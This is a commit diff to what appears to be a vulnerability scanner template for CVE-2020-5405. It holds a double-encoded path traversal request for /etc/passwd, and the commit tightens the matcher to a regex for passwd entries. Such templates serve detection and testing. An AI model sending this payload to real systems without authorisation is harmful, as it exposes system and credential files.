Update CVE-2020-5405.yaml
parent
ebcf1ec0f6
commit
8362fb3dc2
|
@ -11,11 +11,12 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "root:"
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
||||
|
|
Loading…
Reference in New Issue